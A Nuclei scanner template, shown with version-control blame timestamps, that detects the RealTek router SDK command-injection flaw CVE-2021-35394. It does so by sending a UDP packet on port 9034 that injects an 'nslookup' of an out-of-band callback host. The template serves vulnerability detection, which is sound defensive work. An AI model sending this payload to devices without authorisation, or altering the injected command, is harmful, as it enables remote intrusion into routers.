2024-12-29 07:00:33 -06:00
|
|
|
id: CVE-2021-35394
|
|
|
|
|
|
|
|
|
|
info:
|
|
|
|
|
name: RealTek AP Router SDK - Arbitrary Command Injection
|
|
|
|
|
author: king-alexander
|
|
|
|
|
severity: critical
|
2025-05-27 02:29:19 +00:00
|
|
|
remediation: Apply the latest security patches or updates provided by RealTek.
|
2025-05-27 10:39:47 +08:00
|
|
|
description: The SDK exposes a UDP server that allows remote execution of arbitray commands.
|
2024-12-29 07:00:33 -06:00
|
|
|
reference:
|
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-35394
|
|
|
|
|
- https://blogs.juniper.net/en-us/threat-research/realtek-cve-2021-35394-exploited-in-the-wild
|
2025-07-28 17:11:21 -05:00
|
|
|
classification:
|
|
|
|
|
epss-score: 0.94335
|
2025-05-27 10:39:47 +08:00
|
|
|
tags: cve,cve2021,realtek,rce,kev
|
|
|
|
|
|
2024-12-29 07:00:33 -06:00
|
|
|
javascript:
|
|
|
|
|
- pre-condition: |
|
|
|
|
|
isUDPPortOpen(Host,Port);
|
|
|
|
|
code: |
|
|
|
|
|
let packet = bytes.NewBuffer();
|
|
|
|
|
let message = `orf;nslookup ${OAST}`
|
|
|
|
|
let data = message;
|
|
|
|
|
packet.WriteString(data)
|
|
|
|
|
let c = require("nuclei/net");
|
|
|
|
|
let conn = c.Open('udp', `${Host}:${Port}`);
|
|
|
|
|
conn.SendHex(packet.Hex());
|
|
|
|
|
|
|
|
|
|
args:
|
|
|
|
|
Host: "{{Host}}"
|
|
|
|
|
Port: 9034
|
|
|
|
|
OAST: "{{interactsh-url}}"
|
|
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
|
- type: word
|
|
|
|
|
part: interactsh_protocol
|
|
|
|
|
words:
|
2024-12-29 13:00:55 +00:00
|
|
|
- "dns"
|
2025-07-28 22:24:00 +00:00
|
|
|
# digest: 4b0a00483046022100d0283b1e0d0beeafe6af8ee6d906a5c6b23adb110f5661344618dd7290b490b902210085bf17c10580b299edb8a1c38e96439035f00ceee132fdb8668c43052a091779:922c64590222798bb761d5b6d8e72950
|
